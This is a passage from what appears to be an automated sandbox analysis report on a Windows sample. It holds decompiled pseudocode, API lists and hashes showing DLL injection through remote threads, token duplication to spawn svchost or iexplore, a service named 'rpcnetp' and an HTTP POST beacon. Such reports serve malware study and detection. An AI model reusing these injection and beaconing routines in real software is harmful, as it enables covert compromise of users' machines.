							_t35 = _t54[4]( *_t54, _t36, 0x50, 0x1d1369, 0x1d1369, 3, 0, 0);
							_t54[1] = _t35;
							if(_t35 == 0) {
								goto L6;
							} else {
								_t35 = _t54[9](_t35, "POST", 0x1d1369, 0, 0, 0, 0x84400100, 0);
								_t54[2] = _t35;
								if(_t35 == 0) {
									goto L6;
								}
								_t54[5](_t35, 2,  &_v8, 4);
								_t54[5](_t54[2], 5,  &_v8, 4);
								wsprintfA( &_v40, "%s: 0\r\n", "TagId");
								_t43 = _t54[7](_t54[2],  &_v40, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t34 = ( ~_t43 & 0x00000002) - 1;
								L14:
								return _t34;
							}
						}
						L6:
						_t34 = _t35 | 0xffffffff;
						goto L14;
					}
					FreeLibrary(_t54[0xd]);
					_t54[0xd] = 0;
					_t34 = 0;
					goto L14;
				}
				return _t30 | 0xffffffff;
			}

0x001d2cd4
0x001d2cdb
0x001d2ce1
0x001d2ce8
0x001d2ceb
0x001d2cf9
0x001d2cfc
0x001d2cfe
0x001d2cfe
0x001d2d07
0x001d2d12
0x001d2d14
0x00000000
0x00000000
0x001d2d16
0x001d2d1a
0x001d2d20
0x00000000
0x00000000
0x001d2d2b
0x001d2d30
0x001d2d32
0x001d2d52
0x001d2d59
0x001d2d5c
0x001d2d5e
0x001d2d54
0x001d2d54
0x001d2d54
0x001d2d73
0x001d2d78
0x001d2d7b
0x00000000
0x001d2d7d
0x001d2d8d
0x001d2d92
0x001d2d95
0x00000000
0x00000000
0x001d2da0
0x001d2dae
0x001d2dbf
0x001d2dd3
0x001d2dd8
0x001d2ddd
0x001d2dde
0x00000000
0x001d2dde
0x001d2d7b
0x001d2d34
0x001d2d34
0x00000000
0x001d2d34
0x001d2d3f
0x001d2d45
0x001d2d48
0x00000000
0x001d2d48
0x00000000

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
FreeLibrary.KERNEL32(?), ref: 001D2D3F
inet_ntoa.WSOCK32(?), ref: 001D2D5E
wsprintfA.USER32 ref: 001D2DBF

Strings

%s: 0, xrefs: 001D2DB9
N, xrefs: 001D2CD4
POST, xrefs: 001D2D87
Mozilla/4.0 (compatible; MSIE 6.0;), xrefs: 001D2D26
TagId, xrefs: 001D2DB1
wininet.dll, xrefs: 001D2CCF

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3094, Relevance: 18.2, APIs: 12, Instructions: 179 Total matches: 6
processthread

Similarity

Total matches: 6
API ID: CloseHandle$CreateProcessCreateProcessAsUserCreateThreadDuplicateTokenExGetCurrentProcessIdOpenProcessSetStdHandleSetTokenInformationTerminateProcess
String ID:
API String ID: 3127335161-0
Opcode ID: d2529c531e04d4ae067d5c82a3609593e1c0a8b50e4b57957b408f9e477c39a1
Instruction ID: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f
Opcode Fuzzy Hash: D411598B4588D5B3C8C3B9583C0AB24D4A1EF4A9E5CAD6325B0B9596C44B49390ADF89
Instruction Fuzzy Hash: 52d5a6e819d562572e733741dd7379ddee707760d2556d7286c866b6ac08418f

C-Code - Quality: 96%

			E001D3094(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t101;
				intOrPtr _t103;
				void* _t109;
				void* _t112;
				struct _STARTUPINFOA _t116;
				void** _t117;
				void* _t120;

				_t112 = __ecx;
				_push(0x184);
				_push(0x1d1410);
				E001D1637(__ebx, __edi, __esi);
				 *(_t120 - 0x1c) = 0;
				 *((intOrPtr*)(_t120 - 0x38)) = 0;
				 *((intOrPtr*)(_t120 - 0x3c)) = 1;
				 *(_t120 - 4) = 0;
				_t109 = OpenProcess(0x1f0fff, 1, GetCurrentProcessId());
				 *((intOrPtr*)(_t120 - 0x40)) = _t109;
				if(_t109 == 0) {
					goto L28;
				} else {
					_t116 = 0x44;
					E001D384D(_t120 - 0x90, 0, 1);
					 *(_t120 - 0x90) = _t116;
					 *((short*)(_t120 - 0x60)) = 0;
					 *((intOrPtr*)(_t120 - 0x64)) = 0x181;
					 *((intOrPtr*)(_t120 - 0x50)) = _t109;
					while(1) {
						 *(_t120 - 0x24) = 0;
						if( *((intOrPtr*)(_t120 - 0x3c)) == 0 || E001D3734(_t112, _t120 - 0x194, 0x104) == 0) {
							E001D2B08(_t120 - 0x194, 1);
						} else {
							 *(_t120 - 0x24) = 4;
						}
						if( *(_t120 + 8) == 0) {
							goto L12;
						}
						_t117 = _t120 + 8;
						 *(_t120 - 0x48) = _t117;
						 *(_t120 - 0x20) = 0;
						if(DuplicateTokenEx( *(_t120 + 8), 0x2000000, 0, 0, 1, _t120 - 0x20) != 0) {
							 *(_t120 - 0x44) = 0;
							if(SetTokenInformation( *(_t120 - 0x20), 0xc, _t120 - 0x44, 4) != 0) {
								_t117 = _t120 - 0x20;
								 *(_t120 - 0x48) = _t117;
							}
						}
						 *(_t120 - 0x1c) = CreateProcessAsUserA( *_t117, 0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						if( *(_t120 - 0x20) != 0) {
							CloseHandle( *(_t120 - 0x20));
						}
						L13:
						if(( *(_t120 - 0x24) & 0x00000004) == 0) {
							L23:
							__eflags =  *(_t120 - 0x1c);
							if( *(_t120 - 0x1c) == 0) {
								L26:
								SetStdHandle(0xfffffff6, 0);
								E001D2965(0,  *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
								L28:
								_t66 = _t120 - 4;
								 *_t66 =  *(_t120 - 4) | 0xffffffff;
								__eflags =  *_t66;
								E001D32B0(0);
								return E001D173E( *(_t120 - 0x1c));
							}
							L24:
							__eflags =  *0x1d506c; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							 *((intOrPtr*)(_t120 - 0x38)) = CreateThread(0, 0, E001D2965,  *(_t120 - 0x34), 0, _t120 - 0x4c);
							goto L28;
						}
						if( *(_t120 - 0x1c) == 0) {
							L18:
							if( *((intOrPtr*)(_t120 - 0x3c)) == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t120 - 0x3c)) = 0;
							if( *(_t120 - 0x34) != 0) {
								TerminateProcess( *(_t120 - 0x34), 0);
								CloseHandle( *(_t120 - 0x34));
								 *(_t120 - 0x34) = 0;
							}
							if( *(_t120 - 0x30) != 0) {
								CloseHandle( *(_t120 - 0x30));
								 *(_t120 - 0x30) = 0;
							}
							continue;
						}
						E001D2B08(_t120 - 0x194, 0);
						_t101 = E001D3683(_t112, _t120 - 0x194,  *(_t120 - 0x34), 0);
						 *(_t120 - 0x1c) = _t101;
						if(_t101 != 0) {
							_t103 =  *0x1d50b4; // 0x0
							E001D3020(_t112,  *(_t120 - 0x34),  *((intOrPtr*)(_t103 + 0x34)), 0, 0, _t120 - 0x1c, 0);
						}
						if( *(_t120 - 0x1c) != 0) {
							goto L24;
						} else {
							goto L18;
						}
						L12:
						 *(_t120 - 0x1c) = CreateProcessA(0, _t120 - 0x194, 0, 0, 1,  *(_t120 - 0x24), 0, 0, _t120 - 0x90, _t120 - 0x34);
						goto L13;
					}
				}
			}

0x001d3094
0x001d3094
0x001d3099
0x001d309e
0x001d30a5
0x001d30a8
0x001d30ae
0x001d30b1
0x001d30c7
0x001d30c9
0x001d30ce
0x00000000
0x001d30d4
0x001d30d6
0x001d30e0
0x001d30e5
0x001d30eb
0x001d30ef
0x001d30f6
0x001d30ff
0x001d30ff
0x001d3105
0x001d312e
0x001d311c
0x001d311c
0x001d311c
0x001d3136
0x00000000
0x00000000
0x001d3138
0x001d313b
0x001d313e
0x001d3159
0x001d315b
0x001d3171
0x001d3173
0x001d3176
0x001d3176
0x001d3171
0x001d319d
0x001d31a3
0x001d31a8
0x001d31a8
0x001d31d1
0x001d31d5
0x001d3251
0x001d3251
0x001d3254
0x001d3278
0x001d327b
0x001d3284
0x001d3289
0x001d3294
0x001d3294
0x001d3294
0x001d3294
0x001d3298
0x001d32a5
0x001d32a5
0x001d3256
0x001d3256
0x001d325c
0x00000000
0x00000000
0x001d3273
0x00000000
0x001d3273
0x001d31da
0x001d321c
0x001d321f
0x00000000
0x00000000
0x001d3221
0x001d3227
0x001d322d
0x001d3236
0x001d3238
0x001d3238
0x001d323e
0x001d3247
0x001d3249
0x001d3249
0x00000000
0x001d323e
0x001d31e4
0x001d31f4
0x001d31f9
0x001d31fe
0x001d3207
0x001d3212
0x001d3212
0x001d321a
0x00000000
0x00000000
0x00000000
0x00000000
0x001d31ac
0x001d31ce
0x00000000
0x001d31ce
0x001d30ff

APIs

GetCurrentProcessId.KERNEL32(001D1410,00000184,001D3308,00000000,00000001,00000113,?,?,001D2421), ref: 001D30B4
OpenProcess.KERNEL32(001F0FFF,00000001,00000000,?,?,001D2421), ref: 001D30C1

Part of subcall function 001D3734: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,?,00000044,00000000,?,?,?,001D3118,?,00000104), ref: 001D3751
Part of subcall function 001D3734: lstrcatA.KERNEL32(?,\System32\svchost.exe,?,?,?,001D3118,?,00000104), ref: 001D3763
Part of subcall function 001D3734: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,?), ref: 001D377C
Part of subcall function 001D3734: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,001D3118,?,00000104), ref: 001D3799
Part of subcall function 001D3734: RegCloseKey.ADVAPI32(?,?,?,?,001D3118,?,00000104), ref: 001D37A9

Part of subcall function 001D2B08: GetModuleFileNameA.KERNEL32(?,00000104), ref: 001D2B23
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(?,?,00000044,00000000,76E1EA18), ref: 001D2B59
Part of subcall function 001D2B08: lstrlenA.KERNEL32(?), ref: 001D2B5C
Part of subcall function 001D2B08: lstrcmpiA.KERNEL32(-00000003,001D11C8), ref: 001D2B6A
Part of subcall function 001D2B08: lstrcpyA.KERNEL32(-00000003,001D11C8), ref: 001D2B7C
Part of subcall function 001D2B08: CopyFileA.KERNEL32(?,?,00000000), ref: 001D2B89
Part of subcall function 001D2B08: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001D2BA0
Part of subcall function 001D2B08: SetFilePointer.KERNEL32(00000000,00000092,00000000,00000000), ref: 001D2BDF
Part of subcall function 001D2B08: WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 001D2BF1
Part of subcall function 001D2B08: CloseHandle.KERNEL32(00000000), ref: 001D2BF8

DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000104), ref: 001D3151
SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 001D3169
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 001D3197
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,?,00000000,00000000,?,?), ref: 001D31C8

Part of subcall function 001D3683: VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
Part of subcall function 001D3683: lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
Part of subcall function 001D3683: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
Part of subcall function 001D3683: VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

CloseHandle.KERNEL32(00000000), ref: 001D31A8

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 001D322D
CloseHandle.KERNEL32(?), ref: 001D3236
CloseHandle.KERNEL32(?), ref: 001D3247
CreateThread.KERNEL32(00000000,00000000,Function_00002965,?,00000000,?), ref: 001D326D
SetStdHandle.KERNEL32(000000F6,00000000), ref: 001D327B

Part of subcall function 001D2965: SetStdHandle.KERNEL32(000000F4,?,00000000,001D3289,?), ref: 001D296D
Part of subcall function 001D2965: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D2976
Part of subcall function 001D2965: CloseHandle.KERNEL32(?), ref: 001D297D

Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32C2
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32CC
Part of subcall function 001D32B0: CloseHandle.KERNEL32(?), ref: 001D32D6

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 00403683, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID: !$@
API String ID: 677720824-1106925043
Opcode ID: 48e15aef3bb8d9777781a255bb2fadf36b491b6b4ce89551302cf184b035be13
Instruction ID: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00
Opcode Fuzzy Hash: 1ED0A7C0494E42C1C125A5022CE13A7E244EF0129ECED037079802B6EFBF42313DEF0A
Instruction Fuzzy Hash: d38df066d98dcb4c3f7fb2d5acdc6ed02fbc6297c1945d0034f45a0cc7f25a00

C-Code - Quality: 88%

			E00403683(void* __ecx, void* _a4, void* _a8, char _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						_t7 =  &_a12; // 0x402421
						E00403020(_t20, _t18, __imp__LoadLibraryA, _t22,  *_t7,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x00403683
0x00403686
0x00403687
0x0040368c
0x004036a3
0x004036a7
0x004036c3
0x004036cb
0x004036d6
0x004036d6
0x004036e3
0x004036e3
0x004036f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,004031F9,?,?,00000000,?,00000000), ref: 0040369D
lstrlenA.KERNEL32(?,00000000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,004031F9,?,?,00000000,?,00000000), ref: 004036E3

Part of subcall function 00403020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
Part of subcall function 00403020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
Part of subcall function 00403020: GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
Part of subcall function 00403020: CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 004036CB

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D3683, Relevance: 6.0, APIs: 4, Instructions: 48 Total matches: 3
memorystringinjection

Similarity

Total matches: 3
API ID: VirtualAllocExVirtualFreeExWriteProcessMemorylstrlen
String ID:
API String ID: 677720824-0
Opcode ID: db6d812f9c7be18267a37d50a3ba51ee4b957c21e9a373aaaee3175b4369baed
Instruction ID: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7
Opcode Fuzzy Hash: 70D0A780494E46F4C407B5424C2D326D344EF001D9CDE437074000A6F6BE4A322DEF4A
Instruction Fuzzy Hash: 20e9a58cd3c3d7d5d43ac1eac6eb645310d5d17e5d3f8f00a645a8e2a4464bb7

C-Code - Quality: 87%

			E001D3683(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E001D3020(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x001d3683
0x001d3686
0x001d3687
0x001d368c
0x001d36a3
0x001d36a7
0x001d36c3
0x001d36d6
0x001d36d6
0x001d36e3
0x001d36e3
0x001d36f0

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,?,00000000,76E1EA18,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D369D
lstrlenA.KERNEL32(?,00000000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36AE
WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36BB
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,001D31F9,?,?,00000000,?,00000000), ref: 001D36E3

Part of subcall function 001D3020: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
Part of subcall function 001D3020: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
Part of subcall function 001D3020: GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
Part of subcall function 001D3020: CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D23B1, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94 Total matches: 6
timewindow

Similarity

Total matches: 6
API ID: KillTimerPeekMessageSetTimer$DefWindowProcPostQuitMessageSetEvent
String ID: d
API String ID: 2989656138-2564639436
Opcode ID: 84e743ce579fb83e573cc9db47027a5d92d4bae25c0e57b22563aa8666223114
Instruction ID: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1
Opcode Fuzzy Hash: E9F046477B4A8431CD8BB564500D3E2E187676A2C2DED9667F9087228CDB8C77460E87
Instruction Fuzzy Hash: f8f6ae56d72572d2a7ecf92d988ca55aad03d1572bbfb16aa9d6bab595837ed1

C-Code - Quality: 100%

			E001D23B1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				int _t14;
				int _t17;
				void* _t20;
				int _t21;
				void* _t22;
				void* _t25;
				int _t28;
				_Unknown_base(*)()* _t32;
				void* _t34;
				struct HWND__* _t35;

				_t35 = _a4;
				_t14 = _a8;
				_t32 = 0;
				if(_t14 == 0) {
					L17:
					KillTimer(_t35, 0x64);
					do {
						_t17 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t17;
					} while (_t17 != 0);
					PostQuitMessage(_t32);
					__eflags = _a8 - 0x11;
					if(_a8 == 0x11) {
						L4:
						return DefWindowProcA(_t35, _a8, _a12, _a16);
					}
					L20:
					return 0;
				}
				_t20 = _t14 - 0xf;
				if(_t20 == 0) {
					 *0x1d5078 = 1;
					 *0x1d5049 = _t32;
					 *0x1d50bc = _t32;
					L12:
					_t21 = E001D1466(_t34, _a16);
					__eflags = _t21;
					if(_t21 != 0) {
						goto L20;
					}
					_t22 =  *0x1d50c8; // 0x0
					__eflags = _t22 - _t32;
					if(_t22 != _t32) {
						 *0x1d5078 = 1;
						SetEvent(_t22);
					}
					__eflags =  *0x1d5078 - _t32; // 0x0
					if(__eflags != 0) {
						goto L17;
					} else {
						SetTimer(_a4, 0x64, 0x6ddd00, _t32);
						goto L20;
					}
				}
				_t25 = _t20 - 0x102;
				if(_t25 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L4;
					}
					KillTimer(_t35, 0x64);
					do {
						_t28 = PeekMessageA( &_v32, _t35, 0x113, 0x113, 1);
						__eflags = _t28;
					} while (_t28 != 0);
					E001D32E0(_t32, _t34, _t35);
					__eflags =  *0x1d506c; // 0x0
					if(__eflags == 0) {
						SetTimer(_t35, 0x64, 0x6ddd00, 0);
					}
					goto L4;
				}
				if(_t25 == 0x2ed) {
					goto L12;
				}
				goto L4;
			}

0x001d23bd
0x001d23c1
0x001d23c4
0x001d23c5
0x001d248d
0x001d2490
0x001d249b
0x001d24a4
0x001d24aa
0x001d24aa
0x001d24af
0x001d24b5
0x001d24b9
0x001d23de
0x00000000
0x001d23e8
0x001d24bf
0x00000000
0x001d24bf
0x001d23cb
0x001d23ce
0x001d243c
0x001d2443
0x001d2449
0x001d244f
0x001d2452
0x001d2457
0x001d2459
0x00000000
0x00000000
0x001d245b
0x001d2460
0x001d2462
0x001d2465
0x001d246c
0x001d246c
0x001d2472
0x001d2478
0x00000000
0x001d247a
0x001d2485
0x00000000
0x001d2485
0x001d2478
0x001d23d0
0x001d23d5
0x001d23f5
0x001d23f9
0x00000000
0x00000000
0x001d23fe
0x001d2409
0x001d2412
0x001d2418
0x001d2418
0x001d241c
0x001d2423
0x001d2429
0x001d2434
0x001d2434
0x00000000
0x001d2429
0x001d23dc
0x00000000
0x00000000
0x00000000

APIs

DefWindowProcA.USER32(?,00000011,?,?), ref: 001D23E8
KillTimer.USER32(?,00000064), ref: 001D23FE
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D2412
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2434

Part of subcall function 001D1466: PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
Part of subcall function 001D1466: WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
Part of subcall function 001D1466: CloseHandle.KERNEL32 ref: 001D149C
Part of subcall function 001D1466: CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

SetEvent.KERNEL32(00000000), ref: 001D246C
SetTimer.USER32(?,00000064,006DDD00,00000000), ref: 001D2485
KillTimer.USER32(?,00000064), ref: 001D2490
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 001D24A4
PostQuitMessage.USER32(00000000), ref: 001D24AF

Strings

d, xrefs: 001D23F5

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D34E1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80 Total matches: 6
synchronizationregistrythread

Similarity

Total matches: 6
API ID: CloseHandleWaitForSingleObject$CreateEventCreateThreadPostMessageRegisterServiceCtrlHandler
String ID: rpcnetp
API String ID: 1312310708-3180878357
Opcode ID: 6fa48f6244e0a94e0ec1405d0d9bbe99e9497798e0a464c9f7457b8b0bb501eb
Instruction ID: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82
Opcode Fuzzy Hash: 56F0271719401EB3C803F8B38C6C73B17026B599C9EED734531627408CAA0D3244DF4B
Instruction Fuzzy Hash: 05a59ccedef4400ca5738f33da270d839a534878fef554df57ca7f90b4351e82

C-Code - Quality: 75%

			E001D34E1() {
				long _v32;
				int _t3;
				struct HWND__* _t10;
				intOrPtr _t17;
				void* _t21;

				 *0x1d504c = CreateEventA(0, 1, 0, 0);
				 *0x1d5050 = 0x10;
				 *0x1d505c = 0x42a;
				 *0x1d5060 = 1;
				_t3 = RegisterServiceCtrlHandlerA("rpcnetp", E001D2FDE);
				 *0x1d50b8 = _t3;
				if(_t3 != 0) {
					_push(0);
					_push(0x1388);
					_t17 = 2;
					_push(_t17);
					 *0x1d5058 = 1;
					E001D2619();
					 *0x1d5058 = 5;
					E001D2619(4, 0, 0);
					E001D35DB();
					 *0x1d505c = 0;
					 *0x1d5060 = 0;
					_t21 = CreateThread(0, 0, E001D2C05, 0, 0,  &_v32);
					if(_t21 != 0) {
						WaitForSingleObject( *0x1d504c, 0xffffffff);
						_t10 =  *0x1d50c0; // 0x0
						if(_t10 != 0) {
							PostMessageA(_t10, 0x11, 0, 0);
						}
						WaitForSingleObject(_t21, 0x7530);
						CloseHandle(_t21);
					} else {
						 *0x1d5060 = _t17;
					}
					CloseHandle( *0x1d504c);
					return E001D2619(1, 0, 0);
				}
				return _t3;
			}

0x001d34fd
0x001d3502
0x001d350c
0x001d3516
0x001d351c
0x001d3524
0x001d3529
0x001d3531
0x001d3532
0x001d3539
0x001d353a
0x001d353b
0x001d3541
0x001d354a
0x001d3554
0x001d3559
0x001d356c
0x001d3572
0x001d357e
0x001d3582
0x001d359a
0x001d359c
0x001d35a3
0x001d35aa
0x001d35aa
0x001d35b6
0x001d35b9
0x001d3584
0x001d3584
0x001d3584
0x001d35c5
0x00000000
0x001d35d4
0x001d35d8

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D34ED
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnetp,001D2FDE), ref: 001D351C

Part of subcall function 001D2619: SetServiceStatus.ADVAPI32(001D5050,001D3546,00000002,00001388,00000000), ref: 001D263F

Part of subcall function 001D35DB: RegOpenKeyExA.ADVAPI32(80000002,00000000,000F003F,?,00000000), ref: 001D35F9
Part of subcall function 001D35DB: RegDeleteValueA.ADVAPI32(?,?,?,00000002), ref: 001D3617
Part of subcall function 001D35DB: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000002), ref: 001D3630
Part of subcall function 001D35DB: RegCloseKey.ADVAPI32(?,?,00000002), ref: 001D3639

CreateThread.KERNEL32(00000000,00000000,001D2C05,00000000,00000000,?), ref: 001D3578
WaitForSingleObject.KERNEL32(000000FF), ref: 001D359A
PostMessageA.USER32(00000000,00000011,00000000,00000000), ref: 001D35AA
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001D35B6
CloseHandle.KERNEL32(00000000), ref: 001D35B9
CloseHandle.KERNEL32 ref: 001D35C5

Strings

rpcnetp, xrefs: 001D34F8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2165, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90 Total matches: 6
thread

Similarity

Total matches: 6
API ID: ReadProcessMemory$ExitThreadGetStdHandleResetEventSetEvent
String ID: x
API String ID: 3363633688-2363233923
Opcode ID: fde0bc8fb109669d3739e76c01462afd47aceeb39e8aeb63b7d363bff009e474
Instruction ID: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37
Opcode Fuzzy Hash: 9FF02BD509C909B3D07734881B12F222385FF82DDDD4EDB3538B4642C6BF09A50AA754
Instruction Fuzzy Hash: d25dc53b450804b30b42871723f188176ff746c243b861f620f223eb1a999b37

C-Code - Quality: 84%

			E001D2165() {
				int _t51;
				void _t52;
				long _t54;
				void* _t56;
				intOrPtr* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t65;
				void* _t67;
				intOrPtr _t69;
				void* _t70;

				_push(0xdb0);
				_push(0x1d1400);
				E001D1637(_t60, _t64, _t67);
				 *(_t70 - 0x1c) =  *(_t70 - 0x1c) & 0x00000000;
				_t61 = GetStdHandle(0xfffffff4);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_t65 =  *(_t70 + 8);
				if(ReadProcessMemory(_t61, _t65, _t70 - 0x30, 0x10, _t70 - 0x34) == 0) {
					L16:
					 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
					ExitThread( *(_t70 - 0x1c));
				}
				_t66 = _t65 -  *((intOrPtr*)(_t70 - 0x2c));
				if(ReadProcessMemory(_t61, _t65 -  *((intOrPtr*)(_t70 - 0x2c)), _t70 - 0x20, 4, _t70 - 0x34) == 0) {
					goto L16;
				}
